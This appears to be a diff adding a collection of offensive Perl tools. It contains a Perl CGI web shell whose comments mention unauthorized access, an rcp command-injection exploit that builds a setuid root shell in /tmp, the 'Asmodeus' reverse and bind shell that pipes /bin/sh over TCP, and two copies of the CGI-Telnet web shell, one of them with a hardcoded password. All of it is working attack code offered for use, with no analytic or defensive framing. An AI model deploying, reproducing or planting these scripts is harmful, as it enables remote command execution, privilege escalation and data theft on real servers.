##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
############################################################
#V celjah nesankcionirovannogo dostupa smeni etot parol`"
#$pwd='';
print "Content-type: text/html\n\n";
&read_param();
if (!defined$param{dir}){$param{dir}="/"};
if (!defined$param{cmd}){$param{cmd}="ls -la"};
##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
print << "[ins1]";
<head>
<title>::Network Security Team::</title>
<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
<font size=-2 face=verdana><br><br>
<style>
BODY, TD { font-family: Tahoma; font-size: 12px; }
INPUT.TEXT {
font-family : Arial;
font-size : 8pt;
color : Black;
width : 100%;
background-color : #F1F1F1;
border-style : solid;
border-width : 0px;
border-color : Silver;
}
INPUT.BUTTON {
font-family : Arial;
font-size : 8pt;
width : 100px;
border-width : 1px;
color : Black;
background-color : D1D1D1;
border-color : silver;
border-style : solid;
}
</style>
</head>
<body bgcolor=#B9B9B9>
Vvedite zapros:
<table width=500 bgcolor=D9D9D9><tr><td>
[ins1]
print "cd $param{dir}&&$param{cmd}";
print << "[ins2]";
</td></tr></table>
Otvet na zapros:
<table width=500 bgcolor=D9D9D9><tr><td><pre>
[ins2]
#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=<FILEHANDLE>){print "$line";};
close (FILEHANDLE);
print << "[ins3]";
</pre></td></tr></table>
<form action=pshell.cgi>
DIR dlja sledujushego zaprosa:
<input type=text class="TEXT" name=dir value=$param{dir}>
Sledujushij zapros:
<input type=text class="TEXT" name=cmd value=$param{cmd}>
<input type=submit class="button" value="Submit">
<input type=reset class="button" value="Reset">
</form>
</body>
</html>
[ins3]
sub read_param {
$buffer = "$ENV{'QUERY_STRING'}";
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/\+/ /g;
$value =~ s/%20/ /g;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$param{$name} = $value;
}
}
#########################<<KONEC>>#####################################

31
pl/rcpexp.pl Normal file
View File

@@ -0,0 +1,31 @@
#!/usr/bin/perl -w
$RCPFILE="/usr/bin/rcp" ;
sub USAGE
{
printf "Starting RCP Exploit" ;
exit 0 ;
}
if ( ! -u "$RCPFILE" )
{
printf "RCP is not suid, quiting\n" ;
exit 0;
}
open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
close(TEMP);
open(HMM, ">hey")|| die "Something went wrong: $!";
close(HMM);
system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
printf "Ok, launching a rootshell, lets hope shit went well ... \n" ;
exec '/tmp/shell' ;
#EOF

131
pl/remot shell.pl Normal file
View File

@@ -0,0 +1,131 @@
#!/usr/bin/perl
#
# Asmodeus v0.1
# Perl Remote Shell
# by phuket
# www.smoking-gnu.org
#
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
#
# perl asmodeus.pl client 6666 127.0.0.1
# perl asmodeus.pl server 6666
#
use Socket;
$cs=$ARGV[0];
$port=$ARGV[1];
$host=$ARGV[2];
if ($cs eq 'client') {&client}
elsif ($cs eq 'server') {&server}
sub client{
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
$paddr=sockaddr_in("$port", $internet_addr);
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
open(STDIN, ">&TO_SERVER");
open(STDOUT, ">&TO_SERVER");
open(STDERR, ">&TO_SERVER");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(TO_SERVER);
}
sub server{
$proto=getprotobyname('tcp');
$0="asm";
$system='/bin/sh';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(STDIN);
close(STDOUT);
close(STDERR);
return;
}
}

697
pl/telnet.cgi.pl Normal file
View File

@@ -0,0 +1,697 @@
#!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = ""; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 100000; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<title>CGI-Telnet Version 1.0</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
$ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"><3E> 2001, Rohitab
Batra</font><font color="#FF0000">
.-&quot; &quot;-.
/ \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font
color="#808080">________________________&gt;</font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "</font></body></html>";
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "<code>Connection closed by foreign host.<br><br></code>";
}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "<code>$Prompt $RunCommand</code>";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "<code>$Prompt $RunCommand</code><xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp>";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "<code>Failed to download $FileUrl: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "<code>Failed to download $SendFile: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");
# start the uploading process
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "</code>";
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default
# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}

692
pl/telnet.pl Normal file
View File

@@ -0,0 +1,692 @@
#!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "1236987navaro"; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CGI-Telnet Version 1.0</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
